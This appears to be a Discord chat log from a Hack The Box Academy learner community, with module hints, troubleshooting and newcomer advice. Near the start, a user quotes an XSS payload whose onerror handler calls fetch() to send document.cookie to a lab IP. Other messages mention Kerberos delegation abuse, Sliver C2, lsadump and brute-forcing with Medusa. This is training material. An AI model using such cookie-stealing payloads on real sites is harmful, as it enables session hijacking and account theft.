I'm working on Exploiting XSS via WebSockets section. I know that ||InnerHTML is used||. Hence, I'm using the following payload:
||<img src='x' onerror='fetch("http://10.10.14.190:8001/exfil?data=" + encodeURIComponent(document.cookie))'||
However, I can't obtain the admin's cookie. If someone could provide a hint, I would appreciate it as I didn't get the hint on the section.
Link: https://academy.hackthebox.com/module/231/section/2487
can someone help me with Intro to C2 Operations with Sliver -> Skills Assessment-> Q3 Escalate your privileges and submit the contents of the flag.txt file on the Administrator's desktop on the domain controller I can't find the way to DC. Found a user on the machine but I don't know how to use it
Iirc you have rc as service user on the dc no?
Can I dm you? Don't want to spoil er anything
Sure
Hello i am facing an issue with that:
https://academy.hackthebox.com/module/295/section/3371
When I try to give the answer it says it is not correct, but it is also written inside the module. I think anyway the answer I am giving is correct. Could I talk with somebody?
yo,
in the common protocol section in Networking Fundamentals module
why is DNS mentioned under both TCP as well as UDP ?
as far as i recall from a networking course it was mentioned that DNS uses UDP as there will be a lot of overhead which is not necessary for mere domain name resolving
Good afternoon guys, does someone know how I can run this command here?
Why i can't send a pic here
Only verified users can post pictures. Read and follow #welcome
Cool got it
PowerShell does not know cURL.
You can use Invoke-WebRequest instead
mmm
Why am I getting this error? This is an unconstrained delegation users section in Kerberos attack. The tool is krbrelayx
If it's not getting the ticket, you have to specify the target with --target
& TFTP is also repeated.., as well as NTP, there's a lot of overlapping between the two categories..
in a world filled with violence, every form of what?
Hello,
I hope you’re doing well. I’m currently working on the Academy track for brute-forcing a web service.
I successfully brute-forced the SSH user, no issues there.
I’ve scanned all the ports on the machine, but I don’t see any FTP service.
Just in case, I’m wondering if a banner might be returning the wrong fingerprint. I created a script to brute-force each open port using Medusa.
I just wanted to ask for a hint:
I’ve found several authentication portals on the machine, and I’m wondering if I should focus on crafting FORM requests with Medusa instead to complete the exercise?
Thank you in advance!
Wrong path?
I think
Why are the web server's ssh ports open...
Ok. I continue to search.
Thx
good evening
I want to ask about the Network Enumeration with Nmap module
is this host discovery and host port scanning part really an error? because in the host discovery module there is no IP given to find what OS is being used and in the port scanning the IP is active but the available TCP IP cannot be searched
Can anyone help me ?
Host discovery is often used to detect which IP addresses are active on the network
After I detect an active network, the result is still an error
After this process, you need to use one of the active IP addresses for port scanning, for example:
"nmap -p 1-25565 1.1.1.1"
But I think you are getting an error here
You don't need IP just check the previous nmap result which is given. Tip:- Focus on the TTL value.
can someone help me with this please?
abuse
what?
?
@spiral sinew @rustic sage thankyou
I dont think you are supposed to execute these commands from windows, but from linux instead
I think if the module tells you to use cURL, then you can use the PwnBox
but i still can't find the answer
I'm with the vpn
You can run in your own terminal
but i still can't find the answer
If anyone is available and did that module, just to see if I am sending the incorrect answer or it is just the platform with an incorrect question?
hello I am doing the medium lab of the password attacks section and I would like to know if I must obtain root
I obtain a private ssh key in the user folder "dennis"
why does this key allow me to connect as root root@ip -i id_rsa when it is the key found in the personal directory of dennis which does not have elevated privileges
HI
Im stuck on a question in Introduction to penetration testing
The question is what is the first ethical principle
I put in Do No Harm but its saying that its incorrect
are you copying/pasting the command shown in the section? If yes, that doesn't work. Check the IP address and port when spawning the target and adjust the command to your needs.
yow
The command looks fine the gobuster one, however as I already said you need to use the port specified next to the target IP. Is the target port 81?
👋🏾
hi, is it possible to restart a module from the beginning and "erase" progress?
Erasing progress - no, there was a browser plugin created by one of the people in the community that hides the submitted answers
oh ok can you tell me the plugin name pls ?
I don't recall, but if you verify your account in the server you might find it in some of the channels
ok thanks sir
it was posted here: #resources-tools message
thanks ❤️
guys someone completed intro to academy's purple modules?
Any hint for my question just before. Stuck.
Medusa for brute force ftpuser but in the opening port, nothing in ftp.
Did you check the right one?
..
i would love to help you but i'm a newbie 😦
I checked all open ports.
That machine is laggy
It required multiple restarts for me
Ok thanks. 👊
Hi, I have been trying the wordpress hacking module. But I am stuck at the beginning of it. Can someone help me out.
hi, is something wrong with download links on this page https://help.hackthebox.com/en/articles/6369713-installing-parrot-security-on-a-vm#h_2057391f2a
anyone could give me a hint for fourth question on Sliver's skill assessment?
There is a PS script somewhere
I am already on dc with that user
Yes, I run lsadump
Then the jump is easy.... Simple ticket crafting if you know what I mean
Might be a double hop problem if you're strictly using Sliver
Can I dm you?
Sure
Hello 👋🏾 everyone
I'm new here
It's very exciting to be here with you guys
I'm hoping to learn a lot from everyone
please help me on this
Cross-Site Scripting (XSS) / Phishing
getting error: Issue in sending URL!
Despite several restarts, the issue remains the same. I’ll move on from this exercise for now, but I’ll come back to it later. Thank you anyway!
Don't spoil skill assessments
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
hello.
I am doing the getting started Module and on the public exploits section
Am I getting distracted with the server being apache and trying to find an exploit for it?
Did you visit the web page?
It's generally unlikely the underlying service is vulnerable, typically what's vulnerable is something like the CMS and plugins
You want to target the underlying service as a last resort
Hence why the hint says search for plugin exploit
Yes and that was my problem. I got so distracted with the apache running on an odd port that I didn't do the basic thing and that is visiting the webpage
It'll hit you like a ton of bricks iirc it's literally in big bold letters as soon as you go on it
I need to not get tunnel vision
It happens
one more thing. When I set the LHOST can I set it to tun0 like it has in the examples?
Yes
set lhost tun0
But that's if the exploit even uses the lhost variable
If it doesn't use/require it, no need to set it
Also the example isn't gonna be 1:1 of what you're gonna do for the practical
The example is there to show you a line of thought process
Linux Fundamentals, Filter Contents, Q3: Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.
Should I be able to get to the webpage on Safari from inside the instance? I'm just learning curl and I've tried several commands I found from searching Google, but even when I do just curl https://www.inlanefreight.com, I get curl: (28) Failed to connect to www.inlanefreight.com port 443 after 133234 ms: Couldn't connect to server. Is this a user error situation, or is my spawned instance not connecting to the URL like it's supposed to?
Could be a pwnbox restriction being dumb
You can use your own vm to do this exercise
Either way it's a pita
pita?
ah, haha got it
To copy/paste from the forum https://forum.hackthebox.com/t/linux-fundamentals-filter-content-filter-all-unique-paths-of-domain/270162
||I completed this exercise with the following command :
curl -s https://www.inlanefreight.com | tr -d \'\" | grep -o -E "(href|url|src)=[^ >]+" | cut -d '=' -f 2 | grep -vE ".*(defer|\.org|google|themeansar).*" | cut -d "?" -f 1 | sort | uniq | tee /dev/stderr | wc -l
Let me explain each step :
curl -s https://www.inlanefreight.com
This gets the URL content but without the metrics output automatically added by curl when it outputs the result. These metrics will get inserted before and in the middle of fetched data if not ignored.
tr -d \'\"
URL and other HTML elements parameter’s values can be encapsulated between either quotes or double quotes or not encapsulated at all. So, to make parsing easier, I prefer removing them.
grep -o -E "(href|url|src)=[^ >]+"
In HTML, URLs are given in href, url or src elements. So I use a grep to retrieve the attribute and its URL value ONLY thanks to the regex stopping at the first space or > met.
cut -d '=' -f 2
Now, I am left with attributes having the following structure : (href|url|src)=url
So, I split each entry using the = delimiter and keeping only the url.
grep -vE ".*(defer|\.org|google|themeansar).*"
Now, I have all available URLs but not all are part of the target domain. So I use the -v grep option to keep only strings not matching the given regex where I specified specific words found in url I wanted to ignore.
cut -d "?" -f 1
URL may have query strings. A url points to a resource but this resource may be a script taking parameters to give us the right result. As the exercise asks us to count unique url in the domain, we have to ignore query strings / parameters. So I split urls using the ? delimiter as this is the character used to indicate start of the query string and I keep only the first part.
sort | uniq | tee /dev/stderr | wc -l
Finally, I just need to sort found urls with the sort command, remove duplicates with the uniq command and count lines with wc command to get the result.||
I cheated when I went through it and looked up a forum answer because it was just straight annoying (and trying to get chatGPT to do it is like pulling teeth)
By far one of the more out of place sections in an intro module
I found that one too, it gives me an answer of 0. That's why I was thinking it's a connection issue with the instance
thanks anyway
Connection issues for sure if curl isn't connecting
I suggest just setting up your own vm, it'll be better in the long run
When I run the exploit, am I supposed to be given a terminal, does it supposed to download a file?
that depends on the exploit
the exploit for the wordpress simple backup plugin
if it's on nibbles i don't think so but i can't remember tbh. a lot of times the exploit will have some comments or a github page describing what it does.
I am reading about the exploit on rapid7
it seems all I do is set the RHOSTS and run the exploit
try reading the contents of the exploit file itself
I got it and I see where I made the mistake
I was thinking the flag was going to be in the filepath that was set by the exploit but the instructions tell you where to look 😛
I also do not like where the file is downloaded. I am sure I can change that
yes, true
Hi I'm new to cyber security so can you help me
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
I'm done reading anything else
your reading speed and comprehension is superhuman, you'll have no trouble absorbing the material in academy
#welcome <--
Oh so I just have to click on it
No
The other link i sent is to the academy training site where you can learn and practice things
Oh I read the definition of hacking and other stuff 14 pages
i suggest actually taking the time to understand things not just actually reading and clicking next
This one
So where do I practice
Academy has different learning modules that range from basic "web requests" to advanced "csrf"
Whichever one appeals to you.
Hmmm
I suggest the information security fundamentals skill path if you have 0 idea what linux is
Yeah
it also has good networking and AD primers
I use windows
It goes over basic linux, windows, ad, and networking
Well a lot of hacking is done via linux
As a lot of tools are compiled for Linux machines
Bummer
It's not impossible
But you'd have to find windows alternatives to some tools mentioned in the course
ok😫
Also don't suggest using your daily driver OS to hack, using a vm keeps your system more secure
Hack
There's a setting up module that's a rough guide/reference to setting up your own vm
So how do I get linux
Do you use python
Python isn't an OS, but I have written a thing or two in python
hf
Where do I join
Have fun, if you continuously ask questions that are explained in the reading i will not help you
skill paths
And I'll be encouraging you to use your brain
Ok
If it's explained in the reading, then you shouldn't be asking about it
Yeah
Also you'll need to fill out a parental consent form to use services since you admitted to being a minor
I'm a teen
Cmon man
Do I have to pay
It's in the ToS
To get the parental consent form? No
But not everything on academy is free
That's a relief
What
Tier 0 modules are the free modules as they give back the cubes spent
Above tier 0 it's a 20% return on modules completed
I'm in 8th grade I don't have money
If you want free learning, Google.
That's not my problem
You can ask parents about subscribing to academy as it's an interest
😵💫
They won't accept
You might be able to get support to approve you for the student discount
Especially with paying
$8/month and access to all modules up through tier2
Again, not my problem
If they don't want to support you learning something that interests you, that's between you and them
Free courses and Google can only get you so far in terms of quality
And videos
I suggest also learning how to take proper notes
Yeah but I will apply my programming skills
Eh you don't need much programming skills tbh
My knowledge of python is rudimentary at best
That's ...
Knowledge of php and js practically non-existent
I know enough to do what I need to
I do that in my leisure time
It's a broad field kid, you'll find something that sticks more for you than others
@fathom pendant have you done the CWEE path?
Pls don't use the k word
Fuck no
Ok juvenile
Use my name
I know I'm coming off as harsh, but that's the reality of it

